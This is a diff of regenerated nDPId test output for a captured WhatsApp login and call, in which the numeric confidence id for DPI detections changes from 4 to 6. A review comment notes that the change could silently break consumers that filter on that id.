00618{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":883,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1432582296339,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1432582296339,"pkt":"xiwDYGpkAPS5Jrv0CABFwACafE8AAEAR0VrAqAIEHw1KMM46DZYAhr8lAAMAaiESpEIAAMYoECn4BPzbT0BAAQBmAQAMg3Xe01iNThr0oMxz4g8yD3fN+Bpz1wfmSsMwaadvnUwroGLz0VM5S4DttzrmDPMSBOgeXpPF04uIBCkoaMH+hW2Svovhs3GWh\/N1CnZ6UVrnXy6FvDLog+b+F7o9EvQF2yeF"} -00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":883,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582296339,"flow_last_seen":1432582296339,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432582296339,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.74.48","src_port":52794,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":883,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582296339,"flow_last_seen":1432582296339,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432582296339,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.74.48","src_port":52794,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 
00618{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":884,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":2,"flow_last_seen":1432582296339,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1432582296339,"pkt":"xiwDYGpkAPS5Jrv0CABFwACa1VQAAEAReFXAqAIEHw1KMM46DZYAhr8lAAMAaiESpEIAAMYoECn4BPzbT0BAAQBmAQAMg3Xe01iNThr0oMxz4g8yD3fN+Bpz1wfmSsMwaadvnUwroGLz0VM5S4DttzrmDPMSBOgeXpPF04uIBCkoaMH+hW2Svovhs3GWh\/N1CnZ6UVrnXy6FvDLog+b+F7o9EvQF2yeF"} 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":885,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582296339,"flow_last_seen":1432582296339,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432582296339,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.84.48","src_port":52794,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00618{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":885,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1432582296339,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1432582296339,"pkt":"xiwDYGpkAPS5Jrv0CABFwACaPWIAAEARBkjAqAIEHw1UMM46DZYAhgQrAAMAaiESpEIAAPM63M4iUJ72Oh1AAQBmAQAMg3Xe01iNThr0oMxz4g8yD3fN+Bpz1wfmSsMwaadvnUwroGLz0VM5S4DttzrmDPMSBOgeXpPF04uIBCkoaMH+hW2Svovhs3GWh\/N1CnZ6UVrnXy6FvDLog+b+F7o9EvQF2yeF"} 
-00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":885,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582296339,"flow_last_seen":1432582296339,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432582296339,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.84.48","src_port":52794,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":885,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582296339,"flow_last_seen":1432582296339,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432582296339,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.84.48","src_port":52794,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 00618{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":886,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":2,"flow_last_seen":1432582296339,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1432582296339,"pkt":"xiwDYGpkAPS5Jrv0CABFwACa4JwAAEARYw3AqAIEHw1UMM46DZYAhgQrAAMAaiESpEIAAPM63M4iUJ72Oh1AAQBmAQAMg3Xe01iNThr0oMxz4g8yD3fN+Bpz1wfmSsMwaadvnUwroGLz0VM5S4DttzrmDPMSBOgeXpPF04uIBCkoaMH+hW2Svovhs3GWh\/N1CnZ6UVrnXy6FvDLog+b+F7o9EvQF2yeF"} 
00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":887,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":3,"flow_last_seen":1432582296389,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1432582296389,"pkt":"APS5Jrv0xiwDYGpkCABFAABItbcAAFYRcAQfDV0wwKgCBA2WzjoANObxAQMAGCESpEIAABQXleBLNAVxhWEAIAAIAAG2aW4xsYdAAgAIAAABTYyPEzk="} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":889,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":3,"flow_last_seen":1432582296441,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1432582296441,"pkt":"APS5Jrv0xiwDYGpkCABFAABIu\/4AAFIRdr0fDVQwwKgCBA2WzjoANKRaAQMAGCESpEIAAPM63M4iUJ72Oh0AIAAIAAG2aW4xsYdAAgAIAAABTYyPE2E="} 
@@ -248,10 +248,10 @@ 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":901,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":3,"flow_last_seen":1432582296565,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1432582296565,"pkt":"APS5Jrv0xiwDYGpkCABFAABID4sAAFMRJqEfDU\/AwKgCBA2WzjoANNk2AQMAGCESpEIAAL9\/1m08YXkuT0YAIAAIAAG2aW4xsYdAAgAIAAABTYyPE58="} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":944,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582303186,"flow_last_seen":1432582303186,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1432582303186,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"1.194.90.191","src_port":52794,"dst_port":51727,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":944,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":1432582303186,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1432582303186,"pkt":"xiwDYGpkAPS5Jrv0CABFwABI\/ugAAEARW8\/AqAIEAcJav846yg8ANOnpAAEAGCESpEL3EVgs34UDSm8ZSi0ACAAUBo8N2M5l\/vTJutWmGJeHW1ycL5M="} 
-00794{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":944,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582303186,"flow_last_seen":1432582303186,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1432582303186,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"1.194.90.191","src_port":52794,"dst_port":51727,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00794{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":944,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582303186,"flow_last_seen":1432582303186,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1432582303186,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"1.194.90.191","src_port":52794,"dst_port":51727,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 
00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":951,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582303300,"flow_last_seen":1432582303300,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1432582303300,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"91.253.176.65","src_port":52794,"dst_port":9665,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":951,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1432582303300,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1432582303300,"pkt":"xiwDYGpkAPS5Jrv0CABFwABIibwAAEARIT7AqAIEW\/2wQc46JcEANNm\/AAEAGCESpEJqJ0QlQ7N3HdICmh0ACAAUdy+mbVoXRYBrOj7VSucZjRXX5oc="} -00794{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":951,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582303300,"flow_last_seen":1432582303300,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1432582303300,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"91.253.176.65","src_port":52794,"dst_port":9665,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 
+00794{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":951,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582303300,"flow_last_seen":1432582303300,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1432582303300,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"91.253.176.65","src_port":52794,"dst_port":9665,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":964,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":2,"flow_last_seen":1432582303604,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1432582303604,"pkt":"APS5Jrv0xiwDYGpkCABFAABI2uIAAC8R4ddb\/bBBwKgCBCXBzjoANGAJAAEAGCESpEIU61RZ3ZsVVlL2qyQACAAUqmIWy0WW07d7nJ5APIsHCVUVL7g="} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":965,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":3,"flow_last_seen":1432582303607,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1432582303607,"pkt":"xiwDYGpkAPS5Jrv0CABFwABIbOUAAEARPhXAqAIEW\/2wQc46JcEANIk8AQEAGCESpEIU61RZ3ZsVVlL2qyQACAAU6CFWVCyx0lHi4kItE160ER18SxI="} 
00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":972,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":2,"flow_last_seen":1432582303831,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1432582303831,"pkt":"xiwDYGpkAPS5Jrv0CABFwABIdWcAAEAR5VDAqAIEAcJav846yg8ANHIiAAEAGCESpEJT9nMzid0wAn5OIFYACAAUj7UY3ZixJKF1uir6vHE5QBib28w="} 
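Review bot: The numeric key inside `"confidence"` for the DPI label moves from `"4"` to `"6"` on the `detected` events for flow_id 54 and 55 in this hunk, while the label text `"DPI"` is unchanged. The same renumbering recurs in the later hunks of this file (flow_id 57, 6, 41, 1, 50, 49, 42). Context lines still show `{"1":"Match by port"}` and `{"2":"Match by IP"}`, so only part of the id space shifts, presumably because the bumped libnDPI inserted new confidence levels before DPI. Any consumer, detection rule or dashboard that filters on the numeric id would silently misread events after this bump. Matching on the label (`"DPI"`) is the safer contract, and the change deserves a line in the release notes or schema description rather than only appearing in regenerated results.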
@@ -266,8 +266,8 @@ 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1217,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1432582355253,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1432582355253,"pkt":"xiwDYGpkAPS5Jrv0CABFAABAz7ZAAEAGVELAqAIEEa1CZsA1Abt+ckUjAAAAALAC\/\/9LOwAAAgQFtAEDAwQBAQgKLfwhgQAAAAAEAgAA"} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1218,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":1432582355393,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1432582355393,"pkt":"APS5Jrv0xiwDYGpkCABFAAA009MAAO8G4TARrUJmwKgCBAG7wDWkxiaffnJFJIASH\/7nbQAAAgQFoAEDAwQBAQQC"} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1219,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":3,"flow_last_seen":1432582355478,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582355478,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAoTu9AAEAG1SHAqAIEEa1CZsA1Abt+ckUkpMYmoFAQQAAIJwAA"} 
-00992{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1220,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432582355253,"flow_last_seen":1432582355482,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1432582355482,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49205,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.AppleStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p53-buy.itunes.apple.com","ja3":"799135475da362592a4be9199d258726","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01033{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1222,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1432582355253,"flow_last_seen":1432582355622,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":319,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1432582355622,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49205,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.AppleStore","breed":"Safe","category":"SoftwareUpdate"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"p53-buy.itunes.apple.com","ja3":"799135475da362592a4be9199d258726","ja3s":"c253ec3ad88e42f8da4032682892f9a0","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}} +00992{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1220,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432582355253,"flow_last_seen":1432582355482,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1432582355482,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49205,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.AppleStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p53-buy.itunes.apple.com","ja3":"799135475da362592a4be9199d258726","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01033{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1222,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1432582355253,"flow_last_seen":1432582355622,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":319,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1432582355622,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49205,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": 
{"6":"DPI"},"proto":"TLS.AppleStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p53-buy.itunes.apple.com","ja3":"799135475da362592a4be9199d258726","ja3s":"c253ec3ad88e42f8da4032682892f9a0","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}} 00661{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582224235,"flow_last_seen":1432582224264,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582356195,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"5.178.42.26","src_port":49174,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582224235,"flow_last_seen":1432582224264,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582356195,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"5.178.42.26","src_port":49174,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00663{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582224210,"flow_last_seen":1432582224240,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582356195,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"93.186.135.82","src_port":49173,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
@@ -280,7 +280,7 @@ 00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582223075,"flow_last_seen":1432582223379,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582356195,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.154.66.121","src_port":49166,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582225329,"flow_last_seen":1432582225381,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582356195,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.130.137.77","src_port":49176,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582225329,"flow_last_seen":1432582225381,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582356195,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.130.137.77","src_port":49176,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00592{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1432582224230,"flow_last_seen":1432582224260,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":85,"flow_avg_l4_payload_len":17,"midstream":1,"thread_ts_msec":1432582356195,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"23.50.148.228","src_port":49172,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582224230,"flow_last_seen":1432582224260,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":85,"flow_avg_l4_payload_len":17,"midstream":1,"thread_ts_msec":1432582356195,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"23.50.148.228","src_port":49172,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582227884,"flow_last_seen":1432582228167,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1432582356195,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.178.104.14","src_port":49203,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 
